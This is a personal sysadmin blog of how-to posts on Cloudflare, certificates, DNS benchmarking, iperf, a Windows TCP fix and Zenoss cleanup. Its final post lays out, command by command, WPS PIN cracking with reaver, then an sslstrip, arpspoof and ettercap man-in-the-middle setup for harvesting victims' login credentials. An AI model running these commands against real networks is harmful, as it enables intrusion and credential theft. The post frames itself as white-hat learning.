Howto: Configure cloudflare for wordpress

My web hosting company don’t support subdomain SSL certificates. And because Google’s Chrome in July is required HTTPS on all websites (otherwise you get an error your website isn’t safe) I had some deadline to make my blog HTTPS. Cloudflare is a nice reverse proxy solution and the basic plan is free to use also.

So what I did was create a cloudflare account and put my website behind it. After I did that I forced the HTTPS and voila my website was HTTPS. The steps you must take.

Note: this trick will also work if you want to use cloudflare as a reverse proxy to prevent DDoS, to optimize your site security, hide your hosting party backend and make your website a lot faster. If you use a raspbery Pi for example at your home location you can put cloudflare between the visitor and your home IP and save you a lot of trouble.

  • If you use the wordfence plugin also be sure your PHP version is higher than 5.6. Otherwise you get some errors and conflicts (more info)
  • Go to cloudflare an create an account
  • Configure your DNS

  • (temporary) disable your DNSSEC at you domain if that is enabled (cloudflare cannot succesfully transfer your DNS otherwise). For me I had to create a ticket with my domain register company
  • Cloudflare give you 2 new name servers. Ask your domain registry company to change these DNS name servers if you can change it by yourself

  • After a succesfull DNS nameserver change cloudflare shows in the portal everything is ok:

  • Optimize your cloudflare for wordpress in the cloudflare wordpress plugin and enable HTTPS rewrites

  • Now edit your url in the settings >general in your wordpress

  • And finaly go to cloudflare and enable always uses HTTPS under crypto

Now everything is done and your website is fully HTTPS at the frontend (with automatic HTTP > HTTPS URL rewrites). Because my backend don’t have an SSL certificate all the data between cloudflare and my hosting company is still unencrypted. So this is a nasty workaround but you don’t have any problem with Chrome HTTPS problems in the near future anymore.

Create a strong self-signed certificate for multiple years

If you follow these steps you can create a self signed certificate with the following specifications:

  • Wildcard certificate
  • SHA256 hash
  • 10 years
  • 2048 bits public key
  • Client and server verification
  • Sha1 fingerprint

Be aware that self-signed certificates can manipulate by a man-in-the-middle. You should not use this in critical production environments.

Please use windows 10 powershell in admin mode. Otherwise you will get errors

New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname *.domain.local -NotBefore $([datetime]::now.AddDays(-15)) -NotAfter $([datetime]::now.AddDays(3560))

Now export the certificates. Before you copy/paste change the thumbprint with the thumbprint you get from the above command.

$CertPassword = ConvertTo-SecureString -String "YourPassword" -Force –AsPlainText
Export-PfxCertificate -Cert cert:\LocalMachine\My\C6B46CEB7D3A40DB08E78B19FEDD3A24EA7A7919  -FilePath C:\test.pfx -Password $CertPassword
Export-Certificate -Cert Cert:\LocalMachine\My\C6B46CEB7D3A40DB08E78B19FEDD3A24EA7A7919 -FilePath C:\tstcert.cer

Now you can import the PFX with IIS and bind the certificate in IIS.
And import the *.CER in your MMC > Certificates > Computer account > trusted root Certification authority > Certificates

Have fun with your certificate the next 10 years 😀

command-prompt-powershell

Inspiration

Convert PFX to PEM and upload the certificate to Plesk

Export the Private Key:

# openssl pkcs12 -in filename.pfx -nocerts -out key.pem

Remove the password from the SSL certificate (unencrypted is needed for plesk):

# openssl rsa -in key.pem -out server.key

Export the certificate:

# openssl pkcs12 -in filename.pfx -clcerts -nokeys -out cert.pem

Now upload the certificate:

ssl-thawte

And bind the certificate in your hosting settings:

SSL-PII

Find your fastest DNS server

There is a nice cross-platform open source tool to find out what the best DNS server is for your internet connection.

  1. Go to https://code.google.com/p/namebench/downloads/list
  2. Download the namebench tool
  3. Extract and start the tool
  4. Click on “Start Benchmark

2015-08-19 23_40_10-namebench

This benchmark takes some time. About +/- 15 minutes. Then you get the results in your browser:

DNS-Namebench1

DNS-Namebench2

201% faster name query performance!!! WOW!

When everything is setup you can check your DNS settings with a nice website: https://www.dnsleaktest.com/

2015_08_19_23_34_48_Store

To find the best DNS server for you start the tool at different times during the day.

Happy resolving 🙂

Build your own speedtest with iperf

When you have network performance issue’s you often use speed test websites to check the network bandwidth. But mostly of the time you want to monitor the network bandwidth between two specific servers. There is a cross platform speed test utility you can use to monitor the bandwidth. The name of the tool is iperf

How it works:

  • Download the tool: http://iperf.fr/
  • Extract the tool in a folder and jump to the folder with the command line
  • start the tool on the server with this command: iperf -s

iperf server

  • Start the tool on the remote client iperf -c IPSERVER -r
  • The tool first try an upload from the client and then a download from the client

iperf client

If you have any connection problems with iperf try temporary turn of you firewall on both server and client. You can also play with different window sizes with the iperf -c IPSERVER -r -w 40000

For a lot of tips and tricks (even a graphical interface called jperf) check: http://openmaniak.com/iperf.php

Happy troubleshooting 😀

Windows 2012 R2 unstable internet connection

I had 2x HP DL 380 G6 servers with Windows 2012 R2 whit the same problem. When I start a download (I try a lot of different sites) the download drops and fluctuate. When I connect my laptop or another server on the same cable the download is stable. So my conclusion was the onboard nic.

What I tried:

  • Update latest HP SSP (2014_2)
  • Update firmware NIC
  • Update driver NIC
  • Update Windows (patches)
  • change all the default nic settings like disable tcp offload for example
  • Try another switch

Bandwidth during download:

hp ethernet

I thought the problem must be the NIC so I added an intel pro to my server with the same result 🙁

Then I found the command netsh interface tcp show global

Output:

C:\Windows\system32>netsh interface tcp show global
Querying active state...

TCP Global Parameters
----------------------------------------------
Receive-Side Scaling State          : enabled
Chimney Offload State               : disabled
NetDMA State                        : disabled
Direct Cache Access (DCA)           : disabled
Receive Window Auto-Tuning Level    : enabled
Add-On Congestion Control Provider  : none
ECN Capability                      : enabled
RFC 1323 Timestamps                 : disabled
Initial RTO                         : 3000
Receive Segment Coalescing State    : enabled
Non Sack Rtt Resiliency             : disabled
Max SYN Retransmissions             : 2

I dived in to these settings and I found the “Receive Window Auto-Tuning Level on enabled”. So I disabled the setting with:

netsh int tcp set global autotuninglevel=disabled

After that setting the network connection to the internet was stable 🙂

fixed

I found an article on the net that Cisco PIX IOS 8.0 doesn’t support “TCP Window Scaling”. Source: http://www.cisco.com/c/en/us/support/docs/security/ios-firewall/71613-iosfw-tcp-scaling-ts.html

So I use the workaround to disable the Automatic Windows Scaling in Windows because I can’t update our old PIX.

Problem solved 😀

 

Zenoss: Performance issues with too many events

When you have too many events in your zenoss environment the zenoss webinterface will be very sloooooooow. And you get all kind of errors:

  • Script don’t respond
  • Connection refused. Check zeneventserver status on deamons
  • A zenoss error has occurred

When you start top you see alot of java executables when you click on the Infrastructure zenoss button. Java sometimes take 350% CPU.

java -Djetty.host=localhost -server -XX:+HeapDumpOnOutOfMemoryError -DZENOSS_COMMAND=zeneventserver -DZENHOME=/opt/zenoss -Djetty.home=/opt/zenoss -Djetty.logs=/opt/zenoss/log -Dlogback.configurationFile=/opt/zenoss/etc/zeneventserver/logback.xml -Xmx1024m -DZENOSS_DAEMON=y -jar /opt/zenoss/lib/jetty-start-7.5.3.v20111011.jar --config=/opt/zenoss/etc/zeneventserver/jetty/start.config --ini=/opt/zenoss/etc/zeneventserver/jetty/jetty.ini --pre=etc/zeneventserver/jetty/jetty-logging.xml

I’ve read a lot of zenoss documentation on the internet but didn’t   found a nice article to get rid of all the events. So here is an article how I fixed it.

Basic steps:

  1. Backup Zenoss
  2. Stop zenoss
  3. Create a new zeneventserver database
  4. Remove zeneventserver content
  5. Restore the zenoss backup
  6. Start zenoss
  7. Enjoy your fast zenoss 🙂

Detailed steps:

  • ssh zenoss host
  • Switch zenoss user

# su zenoss

  • Create backup:

$ /opt/zenoss/bin/zenbackup -v10

  • Stop Zenoss service

$ zenoss stop

  • edit  the zeneventserver script

nano /opt/zenoss/bin/zeneventserver-create-db

  • Search for root and add the root password

root-password

  • Run the script

$ zeneventserver-create-db --force --dbtype=mysql

  • Clear the zeneventserver folder

rm -rf $ZENHOME/var/zeneventserver/*

Now some tricky part. Zenoss change some MySQL passwords when you do a restore.  This result in a access denied for user zenoss@localhost during a restore. There is a fix for this problem. Reset the zenoss@’localhost’ and zenoss@’%’ MySQL passwords before you do a restore.

First get the current mysql from the global.conf file (yellow). This password is the password you need for the restore.

$nano /opt/zenoss/etc/global.conf

global.conf

Tip: Too check the password (encrypted). You can do the same after you change the password:

$ mysql -uroot -p
mysql> select * from mysql.user;

mysql-encrypted

Now reset the password

SET PASSWORD FOR 'zenoss'@'localhost' = PASSWORD('BEagPxxxxxxxxxxxxxxx');
SET PASSWORD FOR 'zenoss'@'%' = PASSWORD('BEagPxxxxxxxxxxxxxxx');

When you check the permissions now you see another encryption:

$ mysql -uroot -p
mysql> select * from mysql.user;

(I don’t have an image example because this is an production enviroment)

Optional: To check the zenoss user permissions:

mysql> SELECT user, host, db, select_priv, insert_priv, grant_priv FROM mysql.db;

mysql-permissions

Optional: When you still have errors or the above rights ain’t good try these two MySQL scripts:

mysql> CREATE USER 'zenoss'@'%' IDENTIFIED BY 'some_pass';
mysql> GRANT ALL PRIVILEGES ON *.* TO 'zenoss'@'localhost'
-> WITH GRANT OPTION;

mysql> CREATE USER 'zenoss'@'%' IDENTIFIED BY 'some_pass';
mysql> GRANT ALL PRIVILEGES ON *.* TO 'zenoss'@'localhost'
-> WITH GRANT OPTION;

Ok, now everting is set do a restore. The -v stands for verbose and with the no-eventsdb you don’t restore all the events. That’s exactly what we want

zenrestore --file=/opt/zenoss/backups/zenbackup_2014013 -v --no-eventsdb

Now start zenoss

$zenoss start

That’s it.  Enjoy the performance and set some parameters that your events ain’t that big any more in the future.

Source: http://www.nickyeates.com/technology/zenoss/useful_commands_zenoss4
Source: http://community.zenoss.org/docs/DOC-3048

My Raspberry Pi Project: Hack box

Finally I found a nice project for my Raspberry PI 🙂 I’ll write down some notes in this post to make it easier to find back some linux commands. Please use this documentation only as a white hat hacker and for learning purposes only!!!!

First:

To break in a WPS compatible wireless access point:

  • airmon-ng start wlan0
  • wireless-overview
  • reaver -i mon0 -b 64:27:37:50:02:77 -c 5 -vv
  • After +/- 10 hours you have the PSK

Now configure the wireless with your credentials

  • airmon-ng stop wlan0
  • nano /etc/network/interfaces
  • Original file:
auto lo

iface lo inet loopback
iface eth0 inet dhcp

allow-hotplug wlan0
iface wlan0 inet manual
wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf
iface default inet dhcp
  • New file:
auto lo

iface lo inet loopback
iface eth0 inet dhcp
iface wlan0 inet dhcp
wpa-ssid "L0g0ff"
wpa-psk "SomePassword"
allow-hotplug wlan0
iface wlan0 inet dhcp
#wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf
iface default inet dhcp
  • Now bring up the wireless card: ifup wlan0

Now the wireless setup is done we make our PI an IP forwarding server. So that we can do man in the middle attacks.

  • nano /proc/sys/net/ipv4/ip_forward change the 0 to 1
  • iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666 

    (needed to forward all HTTP traffic to SSLStrip)

  • sslstrip -l 666 (do not close this terminal)

Now the proxy is running we want to ARP spoof so that we can redirect all traffic to our PI

  • arpspoof -i wlan0 -t 192.168.1.12 192.168.1.1 (where 1.12 is our victim and 1.1 our gateway) (do not close ths terminal)
  • You can also spoof the entire network with arpspoof -i wlan0 192.168.1.1, but if your PI cannot handle all traffic you will DoS your network.

And now all things are set the sniffing can begin 🙂

  • ettercap -m ettercap.log -Tq -i wlan0 (don’t close the terminal)

The only thing left now is wait that the victim is going to log in a website and the username and password will write in to the ettercap.log file. With the command cat ettercap.log |grep USER you can see all the login credentials.

What did we learn?

  1. Never login to a website without https
  2. Never login to a website with https errors
  3. Always disable WPS on your router
  4. On company wireless sites always use a DMZ

Sources:
http://www.ikwashetniet.blogspot.nl/2012/01/wps-van-handig-hulpmiddel-naar-gapend.html
http://www.hackavision.com/2011/07/sniffing-passwords-over-wifi-connection.html